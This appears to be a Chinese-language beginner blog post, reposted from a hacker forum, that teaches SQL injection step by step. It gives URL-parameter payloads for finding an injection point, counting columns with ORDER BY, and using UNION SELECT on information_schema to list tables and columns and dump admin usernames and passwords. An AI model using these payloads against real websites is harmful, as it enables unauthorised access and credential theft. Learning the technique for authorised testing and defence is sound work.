当前位置:首页 > 未分类 > 正文内容

SQL入门及简单语句

admin12个月前 (08-20)未分类126

1.SQL,SQL注入是什么,有什么危害
      SQL就是是Structured Quevy Language(结构化查询语言)的缩写,主要功能就是与数据库进行交互,返回访问者想查询到的信息。
      SQL注入就是攻击者使用非法的SQL语句,欺骗服务器进行非法查询,得到更多的信息。
      个人想法:SQL注入是针对数据库的,从数据库获得信息。怎么可能用SQL注入方式去搞一个没有数据库的

2.怎样判断是否有注入点
      注入点就是你获取信息的那个口子。
      有三种判断方式,如果全部都是OK的那么这个保证是注入点。
      一,用最简单的单引号' 来判断
            构造 :

  1.        id=1'

如果报错,那基本判断此处有注入点,下一步。
      二,数字型判断
            构造:

  1.        ?id=1 and 1=1

   记住他的页面
            构造:

  1.        ?id=1 and 1=2

   看是否和上一次的页面不一样,如果不一样,则下一步。
      三,字符型判断
            构造:

  1.       ?id=1 and '1'='1

  跟正常的不一样,则判断此处有注入点。。。
      个人想法:我们进行渗透测试时,不一定要用1=2,用这个的原因是因为服务器会进行运算,1=2这个谁都知道是假的,同样是假的还有1=100呀、2=10呀,那这样页面就会和正常的不一样。
3.判断字段数
      使用order by语句,判断他有多少列
      如构造

  1.       ?id=1 order by 32

如果错误,则32变小一点 构造

  1.       ?id=1 order by 18

等到正确,一个个往上试,如18是对的,看看19,20,21,如果25正确,26错误,那字段数是25个。
4.判断回显点
      使用union(假设字段数为2)
      构造:

  1.      ?id=1' union select 1,2,

查看屏幕上出现了数字。
5.使用union联合查询
      这里设字段数和回显点都为2,这里要记住database(),version()
      现在来看看它的数据库名:构造:

  1.       ?id= 1' union select 1,database()


      看看他的MySQL版本:构造:

  1.       ?id=1' union select 1,version()

如果版本为5.0以上的,下一步
      看看他所有表名,构造:

  1.       ?id=1' union  select 1,table_name from information_schema.ta bles where table_schema=database() limit 0,1

如需查看下一个,limit 0,1变成limit 1,1  如果看到了疑似管理员账号密码的表,下一步。 
      这里假设admin表  构造:

  1.        ?id=1' union select 1,column_name from information_schema.coloumns where table_schema=database() and table_name='admin' limit 0,1

复制代码

  如果查询到,下一步
      看看字段内容,这里假设username和password   构造

  1.       ?id=1' union select 1,username from admin limit 0,1

复制代码
  1.       ?id=1' union select 1,password from admin limit 0,1

复制代码


好啦,大家自己去练习吧,加油!!


转载自:http://www.cnhonkerarmy.com/thread-249028-1-1.html

扫描二维码推送至手机访问。

版权声明:本文由勤奋的思远发布,如需转载请注明出处。

如果文章对你有帮助的话就赞助一下吧https://lsybk.xyz/post/75.html

本文链接:https://lsybk.xyz/post/4.html

标签: 渗透测试
分享给朋友:

相关文章

linkboy编音乐播放器(虚拟版)——来自勤奋的锐锐的投稿

linkboy编音乐播放器(虚拟版)——来自勤奋的锐锐的投稿

大家好,这次给大家带来音乐播放器虚拟版(...

给网站配置SSL证书

给网站配置SSL证书

有很多人都不知道如何给网站安排SSL证书...

【渗透课程】特别篇-主流网站程序Oday大全以及拿shell思路【转载】

【渗透课程】特别篇-主流网站程序Oday大全以及拿shell思路【转载】

版权和内容说明:这篇文章不是本站编写,是...

怎么判断一个网站是不是伪静态

怎么判断一个网站是不是伪静态

判断该站点是否伪静态伪静态即是网站本身是...

C++猜数字项目(源代码)

C++猜数字项目(源代码)

这个相比之前的简单多了,就是判断加随机数...

【日志】挖到的第一个洞

【日志】挖到的第一个洞

感觉有点爽,挖到了两个高危洞,而且是第一...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。